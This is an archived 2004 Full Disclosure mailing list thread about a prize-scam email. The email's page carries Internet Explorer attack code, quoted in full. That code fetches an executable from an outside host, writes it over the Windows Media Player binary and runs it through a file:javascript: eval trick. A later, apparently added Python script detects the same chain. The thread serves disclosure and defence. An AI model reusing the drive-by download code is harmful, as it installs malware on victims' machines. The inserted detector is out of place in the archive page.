Full Disclosure mailing list archives
Re: Old Hack?
From: "VeNoMouS" <venom () gen-x co nz>
Date: Tue, 3 Feb 2004 17:22:14 +1300
If you look at the symbols from that exe, they look dodgy:

RegQueryValueExA ShellExecuteA 4FtpPutFileA

It also appears to have a base64 payload inside it. And I only used strings for that; it's too hot to do any real work...

----- Original Message -----
From: "axid3j1al axid3j1al" <axid3j1al () hotmail com>
To: <full-disclosure () lists netsys com>
Sent: Tuesday, February 03, 2004 4:40 PM
Subject: [Full-disclosure] Old Hack?
Has anyone seen this little code injection hack? Is this old? The email has the subject line "congranulations! you won $1169", with body http://sinaraevent.com/bbs/zipcode/6.htm and code:

<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://sinaraevent.com/bbs/zipcode/man.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
<script language="javascript">
function preparecode(code) {
  result = '';
  lines = code.split(/\r\n/);
  for (i=0;i<lines.length;i++) {
    line = lines[i];
    line = line.replace(/^\s+/,"");
    line = line.replace(/\s+$/,"");
    line = line.replace(/'/g,"\\'");
    line = line.replace(/[\\]/g,"\\\\");
    line = line.replace(/[/]/g,"%2f");
    if (line != '') {
      result += line +'\\r\\n';
    }
  }
  return result;
}
function doit() {
  mycode = preparecode(document.all.code.value);
  myURL = "file:javascript:eval('" + mycode + "')";
  window.open(myURL,"_media")
}
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>

braindwish has expired

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
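Defensive note on the chain quoted above: it depends on a handful of fixed strings (the ADODB.Stream object, SaveToFile with a binary stream type, the file:javascript: URL and the _media window target), which makes it easy to flag in mail or web content. The following Python is an added example, not code from the thread; it scores an HTML or email body against those indicators and pulls out the SaveToFile drop path for the incident report. The indicator weights, thresholds and sample documents are constructed for illustration.

```python
import re

# Indicators of the IE "ADODB.Stream file drop via file:javascript:" chain
# discussed in the thread: (name, pattern, weight). Weights are constructed
# for illustration, not tuned against real traffic.
INDICATORS = [
    ("xmlhttp_fetch",       re.compile(r'ActiveXObject\(\s*["\']Microsoft\.XMLHTTP["\']', re.I), 1),
    ("adodb_stream",        re.compile(r'ActiveXObject\(\s*["\']ADODB\.Stream["\']', re.I), 2),
    ("save_to_file",        re.compile(r'\.SaveToFile\s*\(', re.I), 2),
    ("binary_stream_type",  re.compile(r'\.Type\s*=\s*1\b'), 1),
    ("file_javascript_url", re.compile(r'file:\s*javascript:', re.I), 3),
    ("media_bar_target",    re.compile(r'["\']_media["\']', re.I), 2),
    ("hidden_textarea",     re.compile(r'<textarea[^>]*display\s*:\s*none', re.I), 1),
    ("mms_launch",          re.compile(r'["\']mms://', re.I), 1),
]

def scan_html(html):
    """Return (score, matched indicator names) for one HTML or email body."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(html)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits

def drop_targets(html):
    """Extract the path each SaveToFile call writes to, for the IoC report."""
    return re.findall(r'SaveToFile\(\s*["\']([^"\']+)["\']', html, re.I)

def verdict(score):
    """Constructed thresholds: one weak hit is noise, the full chain is not."""
    if score >= 6:
        return "block"
    if score >= 3:
        return "review"
    return "allow"

# Constructed samples. The suspect one carries only the indicator strings,
# not a working chain (no fetch, eval body elided).
SAMPLE_BENIGN = ('<html><body><script>var x = new XMLHttpRequest();'
                 ' x.open("GET", "/api/status");</script></body></html>')
SAMPLE_SUSPECT = ('<textarea id="code" style="display:none;">'
                  'var s = new ActiveXObject("ADODB.Stream"); s.Type = 1; '
                  's.SaveToFile("C:\\\\Program Files\\\\example.exe", 2);'
                  '</textarea><script>window.open("file:javascript:eval(...)", "_media")</script>')

if __name__ == "__main__":
    for label, doc in (("benign", SAMPLE_BENIGN), ("suspect", SAMPLE_SUSPECT)):
        score, hits = scan_html(doc)
        print(label, verdict(score), score, hits, drop_targets(doc))
```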
Current thread:
- Old Hack? axid3j1al axid3j1al (Feb 02)
- Re: Old Hack? VeNoMouS (Feb 02)
- Re: Old Hack? Steffen Kluge (Feb 02)
- Re: Old Hack? Nick FitzGerald (Feb 03)
- Re: Old Hack? VeNoMouS (Feb 02)
- <Possible follow-ups>
- Old Hack? Feher Tamas (Feb 03)
- Re: Old Hack? Papp Geza (Feb 03)